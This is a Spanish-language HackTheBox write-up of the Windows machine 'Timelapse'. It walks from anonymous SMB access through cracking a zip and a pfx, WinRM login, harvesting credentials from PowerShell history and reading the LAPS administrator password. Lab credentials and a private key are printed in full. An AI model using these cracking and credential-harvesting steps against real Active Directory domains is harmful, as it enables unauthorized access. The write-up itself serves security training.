Timelapse es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Timelapse 10.10.11.152 a /etc/hosts como timelapse.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
nmap -sV -sC -oA enumeration/nmap1 -Pn 10.10.11.152 Nmap scan report for 10.10.11.152 Host is up (0.046s latency). Not shown: 992 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 636/tcp open tcpwrapped 3269/tcp open tcpwrapped Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h59m59s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-07-22T21:59:23 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jul 22 14:00:00 2022 -- 1 IP address (1 host up) scanned in 71.23 seconds |
Hacemos un primer escaneo y vemos varios puertos interesantes así que vamos a ver que podemos sacar de los mismos.
Enumeración
Empezamos enumerando el servicio de smb y podemos obtener el contenido sin necesidad de disponer de claves de acceso.
1 2 3 4 5 6 7 8 9 10 11 |
$ smbclient -L //10.10.11.152 -N Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Shares Disk SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available |
Tenemos acceso así que vamos a ver si podemos sacar algo más de alguno de los directorios y encontramos varios ficheros en el directorio Shares
1 2 3 4 5 6 7 8 9 10 |
$ smbclient //10.10.11.152/Shares/ Enter WORKGROUP\asdf's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Oct 25 15:39:15 2021 .. D 0 Mon Oct 25 15:39:15 2021 Dev D 0 Mon Oct 25 19:40:06 2021 HelpDesk D 0 Mon Oct 25 15:48:42 2021 6367231 blocks of size 4096. 1293571 blocks available |
Así que revisamos cada directorio y nos descargamos su contenido para examinarlo más a fondo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
smb: \> cd Dev smb: \Dev\> ls . D 0 Mon Oct 25 19:40:06 2021 .. D 0 Mon Oct 25 19:40:06 2021 winrm_backup.zip A 2611 Mon Oct 25 15:46:42 2021 get 6367231 blocks of size 4096. 1294022 blocks available smb: \Dev\> get winrm_backup.zip getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (4,0 KiloBytes/sec) (average 4,0 KiloBytes/sec) smb: \Dev\> cd .. smb: \> ls . D 0 Mon Oct 25 15:39:15 2021 .. D 0 Mon Oct 25 15:39:15 2021 Dev D 0 Mon Oct 25 19:40:06 2021 HelpDesk D 0 Mon Oct 25 15:48:42 2021 cd 6367231 blocks of size 4096. 1292659 blocks available smb: \> cd HelpDesk smb: \HelpDesk\> ls . D 0 Mon Oct 25 15:48:42 2021 .. D 0 Mon Oct 25 15:48:42 2021 LAPS.x64.msi A 1118208 Mon Oct 25 14:57:50 2021 LAPS_Datasheet.docx A 104422 Mon Oct 25 14:57:46 2021 LAPS_OperationsGuide.docx A 641378 Mon Oct 25 14:57:40 2021 LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 14:57:44 2021 6367231 blocks of size 4096. 1291349 blocks available smb: \HelpDesk\> get LAPS.x64.msi getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (1130,4 KiloBytes/sec) (average 680,7 KiloBytes/sec) smb: \HelpDesk\> get LAPS_Datasheet.docx getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (208,5 KiloBytes/sec) (average 570,6 KiloBytes/sec) smb: \HelpDesk\> get LAPS_OperationsGuide.docx getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (1038,7 KiloBytes/sec) (average 675,1 KiloBytes/sec) smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (114,1 KiloBytes/sec) (average 570,1 KiloBytes/sec) smb: \HelpDesk\> |
Revisamos en primer lugar el fichero zip, el cual contiene un fichero pfx
1 2 3 4 5 6 7 |
$ unzip -v winrm_backup.zip Archive: winrm_backup.zip Length Method Size Cmpr Date Time CRC-32 Name -------- ------ ------- ---- ---------- ----- -------- ---- 2555 Defl:N 2393 6% 2021-10-25 14:21 12ec5683 legacyy_dev_auth.pfx -------- ------- --- ------- 2555 2393 6% 1 file |
Si probamos a extraer el contenido está protegido por contraseña
1 2 3 4 |
$ unzip winrm_backup.zip Archive: winrm_backup.zip [winrm_backup.zip] legacyy_dev_auth.pfx password: skipping: legacyy_dev_auth.pfx incorrect password |
Así que utilizaremos fcrackzip para romper el cifrado y obtener la password
1 2 3 4 |
$ fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt PASSWORD FOUND!!!!: pw == supremelegacy |
Ha sido más fácil de lo que parecía así que extraemos el contenido
1 2 3 4 |
$ unzip winrm_backup.zip Archive: winrm_backup.zip [winrm_backup.zip] legacyy_dev_auth.pfx password: inflating: legacyy_dev_auth.pfx |
Pero ahora tenemos otro problema, y es que necesitamos otra password diferente para extraer la clave privada y el certificado del fichero pfx, utilizaremos en este caso john para obtener la password y poder extraer su contenido.
En primer lugar extraermos el hash del fichero con pfx2john
1 |
$ python3 /home/asdf/github/JohnTheRipper/run/pfx2john.py legacyy_dev_auth.pfx > legacyy_dev_auth.hash |
Y posteriormente utilizamos este hash para sacar su password
1 2 3 4 5 6 7 8 9 10 11 |
$ john -w=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.hash --rule /usr/share/john/rules/rockyou-30000.rule Using default input encoding: UTF-8 Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x]) Cost 1 (iteration count) is 2000 for all loaded hashes Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status thuglegacy (legacyy_dev_auth.pfx) 1g 0:00:01:27 DONE (2022-07-22 14:23) 0.01138g/s 36785p/s 36785c/s 36785C/s thuglife06..thug211 Use the "--show" option to display all of the cracked passwords reliably Session completed. |
Ahora que ya tenemos la password vamos a extraer su contenido con openssl.
Extraemos la clave privada
1 |
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key -nodes |
Cuyo contenido es
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
Bag Attributes Microsoft Local Key set: <No Values> localKeyID: 01 00 00 00 friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b Microsoft CSP Name: Microsoft Software Key Storage Provider Key Attributes X509v3 Key Usage: 90 -----BEGIN PRIVATE KEY----- MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3 dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2 qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW fAatyP5ry3WLFZKFfF0W9hXw3tBRkUkOOyDIAVMKxmKzguK+BdMIMZLjAZPSUr9j PJFizeFCB0sR5gvReT9fm/iIidaj16WhidQEPQZ6qf3U6qSbGd5f/KhyqXn1tWnL GNdwA0ZBYBRaURBOqEIFmpHbuWZCdis20CvzsLB+Q8LClVz4UkmPX1RTFnHTxJW0 Aos+JHMBRuLw57878BCdjL6DYYhdR4kiLlxLVbyXrP+4w8dOurRgxdYQ6iyL4UmU Ifvrqu8aUdTykJOVv6wWaw5xxH8A31nl/hWt50vEQQKBgQDYcwQvXaezwxnzu+zJ 7BtdnN6DJVthEQ+9jquVUbZWlAI/g2MKtkKkkD9rWZAK6u3LwGmDDCUrcHQBD0h7 tykwN9JTJhuXkkiS1eS3BiAumMrnKFM+wPodXi1+4wJk3YTWKPKLXo71KbLo+5NJ 2LUmvvPDyITQjsoZoGxLDZvLFwKBgQDDjA7YHQ+S3wYk+11q9M5iRR9bBXSbUZja 8LVecW5FDH4iTqWg7xq0uYnLZ01mIswiil53+5Rch5opDzFSaHeS2XNPf/Y//TnV 1+gIb3AICcTAb4bAngau5zm6VSNpYXUjThvrLv3poXezFtCWLEBKrWOxWRP4JegI ZnD1BfmQNwKBgEJYPtgl5Nl829+Roqrh7CFti+a29KN0D1cS/BTwzusKwwWkyB7o btTyQf4tnbE7AViKycyZVGtUNLp+bME/Cyj0c0t5SsvS0tvvJAPVpNejjc381kdN 71xBGcDi5ED2hVj/hBikCz2qYmR3eFYSTrRpo15HgC5NFjV0rrzyluZRAoGAL7s3 QF9Plt0jhdFpixr4aZpPvgsF3Ie9VOveiZAMh4Q2Ia+q1C6pCSYk0WaEyQKDa4b0 6jqZi0B6S71un5vqXAkCEYy9kf8AqAcMl0qEQSIJSaOvc8LfBMBiIe54N1fXnOeK /ww4ZFfKfQd7oLxqcRADvp1st2yhR7OhrN1pfl8CgYEAsJNjb8LdoSZKJZc0/F/r c2gFFK+MMnFncM752xpEtbUrtEULAKkhVMh6mAywIUWaYvpmbHDMPDIGqV7at2+X TTu+fiiJkAr+eTa/Sg3qLEOYgU0cSgWuZI0im3abbDtGlRt2Wga0/Igw9Ewzupc8 A5ZZvI+GsHhm0Oab7PEWlRY= -----END PRIVATE KEY----- |
Y después el certificado
1 |
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt |
Cuyo contenido es
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
Bag Attributes localKeyID: 01 00 00 00 subject=CN = Legacyy issuer=CN = Legacyy -----BEGIN CERTIFICATE----- MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1 MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0 0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z 7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72 MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0 3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/ fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA -----END CERTIFICATE----- |
Ahora que ya tenemos el certificado y la clave privada, utilizamos los mismos para acceder a la máquina con evil-winrm
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
$ ruby /home/asdf/github/evil-winrm/evil-winrm.rb -S -k decrypt-private.key -c certificate.pem -i 10.10.11.152 Evil-WinRM shell v3.3 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\legacyy\Documents> whoami timelapse\legacyy *Evil-WinRM* PS C:\Users\legacyy\Documents> |
Obteniendo la flag de user
Ahora qe ya estamos dentro, nos vamos al escritorio del usuario para obtener nuestra flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd .. *Evil-WinRM* PS C:\Users\legacyy> cd desktop *Evil-WinRM* PS C:\Users\legacyy\desktop> ls Directory: C:\Users\legacyy\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/22/2022 2:26 PM 34 user.txt *Evil-WinRM* PS C:\Users\legacyy\desktop> type user.txt 7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb *Evil-WinRM* PS C:\Users\legacyy\desktop> |
Escalado de privilegios
Ahora el siguiente paso será escalar privilegios, para ello, entre otras cosas revisamos el usuario
1 2 3 4 5 6 7 8 |
*Evil-WinRM* PS C:\Users\legacyy\desktop> whoami /user USER INFORMATION ---------------- User Name SID ================= ============================================ timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603 |
Los privilegios del mismo
1 2 3 4 5 6 7 8 9 10 11 |
*Evil-WinRM* PS C:\Users\legacyy\desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\Users\legacyy\desktop> |
E información de red del usuario
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
*Evil-WinRM* PS C:\Users> net user legacyy User name legacyy Full Name Legacyy Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/23/2021 12:17:10 PM Password expires Never Password changeable 10/24/2021 12:17:10 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 7/22/2022 3:29:40 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *Domain Users *Development The command completed successfully. |
Pero no vemos nada importante así que lanzamos winpeas a ver si nos ayuda en algo y encontramos un fichero muy interesante, se trata del histórico de powershell del usuario, cuyo contenido es el siguiente
1 2 3 4 5 6 7 8 9 10 11 |
*Evil-WinRM* PS C:\users\legacyy\appdata\roaming\microsoft\windows\powershell\psreadline> type ConsoleHost_history.txt whoami ipconfig /all netstat -ano |select-string LIST $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl - SessionOption $so -scriptblock {whoami} get-aduser -filter * -properties * exit |
Revisando el fichero anterior vemos unas credenciales
1 |
svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV |
Pero vamos a aprovechar los comandos existentes en el fichero y vamos a lanzar los mismos, así que preparamos las variables en primer lugar
1 2 3 |
*Evil-WinRM* PS C:\users> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck *Evil-WinRM* PS C:\users> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force *Evil-WinRM* PS C:\users> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) |
Y verificamos
1 2 |
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami} timelapse\svc_deploy |
Vale, ha funcionado, pues vamos a obtener información de los privilegios del usuario
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami /priv} PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {net user svc_deploy} User name svc_deploy Full Name svc_deploy Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/25/2021 12:12:37 PM Password expires Never Password changeable 10/26/2021 12:12:37 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 7/22/2022 3:44:57 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *LAPS_Readers *Domain Users The command completed successfully. |
Si nos fijamos atentamente, el usuario svc_deploy pertenece al grupo LAPS_Readers, lo que quiere decir que es capaz de obtener la password utilizada por el administrador local, conocido esto, vamos a tratar de obtener la misma.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime} PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb DNSHostName : dc01.timelapse.htb Enabled : True ms-Mcs-AdmPwd : S6QY1oDB00ZB8.)8+Cc#]4m1 ms-Mcs-AdmPwdExpirationTime : 133034307686369127 Name : DC01 ObjectClass : computer ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f SamAccountName : DC01$ SID : S-1-5-21-671920749-559770252-3318990721-1000 UserPrincipalName : PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb DNSHostName : Enabled : True Name : DB01 ObjectClass : computer ObjectGUID : d38b3265-230f-47ae-bdcd-f7153da7659d SamAccountName : DB01$ SID : S-1-5-21-671920749-559770252-3318990721-1606 UserPrincipalName : PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb DNSHostName : Enabled : True Name : DB01 ObjectClass : computer ObjectGUID : d38b3265-230f-47ae-bdcd-f7153da7659d SamAccountName : DB01$ SID : S-1-5-21-671920749-559770252-3318990721-1606 UserPrincipalName : PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb DNSHostName : Enabled : True Name : WEB01 ObjectClass : computer ObjectGUID : 897c7cfe-ba15-4181-8f2c-a74f88952683 SamAccountName : WEB01$ SID : S-1-5-21-671920749-559770252-3318990721-1607 UserPrincipalName : PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb DNSHostName : Enabled : True Name : DEV01 ObjectClass : computer ObjectGUID : 02dc961a-7a60-4ec0-a151-0472768814ca SamAccountName : DEV01$ SID : S-1-5-21-671920749-559770252-3318990721-1608 UserPrincipalName : |
Así que ejecutamos el comando y obtenemos la password del administrador local, vamos a probar el acceso con evil-winrm.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ ruby /home/asdf/github/evil-winrm/evil-winrm.rb -S -u Administrator -p "S6QY1oDB00ZB8.)8+Cc#]4m1" -i 10.10.11.152 Evil-WinRM shell v3.3 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami timelapse\administrator |
Obteniendo la flag de root
Ya somos admin, así que ahora vamos a obtener nuestra flag, pero para nuestra sorpresa, no está en el lugar habitual, revisamos la home de cada usuario y en este caso se encuentra en el escritorio del usuario TRX, y no en el del usuario administrator
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
*Evil-WinRM* PS C:\Users\TRX> ls desktop Directory: C:\Users\TRX\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/22/2022 2:26 PM 34 root.txt *Evil-WinRM* PS C:\Users\TRX> type desktop/root.txt 7xxxxxxxxxxxxxxxxxxxxxxxxxxxxb *Evil-WinRM* PS C:\Users\TRX> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace